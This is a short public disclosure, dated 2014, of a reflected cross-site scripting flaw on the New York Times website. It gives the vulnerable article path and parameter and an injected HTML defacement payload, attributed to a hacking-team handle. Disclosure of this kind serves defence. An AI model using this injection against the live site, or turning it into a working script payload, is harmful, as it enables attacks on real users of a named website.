The New York Times website suffers from a cross site scripting vulnerability. The author was unable to get a response from them and is releasing the details.
c95e989d546836b2092632c31447519ff2a90322f114cf8e1c1a72daaec85e8a
================================================================================
Cross Site Scripting on New York Times
================================================================================
# Site: www.nytimes.com
# Date: 25/02/2014
# Author: s4r4d0
# Contact: s4r4d0[at]yahoo[dot]com
# Team: Fatal Error
# Twitter: @FatalErrorSec
# Made in Brazil
================================================================================
[~] PoC :
# Site: www.nytimes.com
# File: /2001/09/23/nyregion/one-family-two-horror-stories.html%3fpagewanted=
# XSS: ">><marquee><h1>XSS By Fatal Error</h1><marquee>
===============================================================================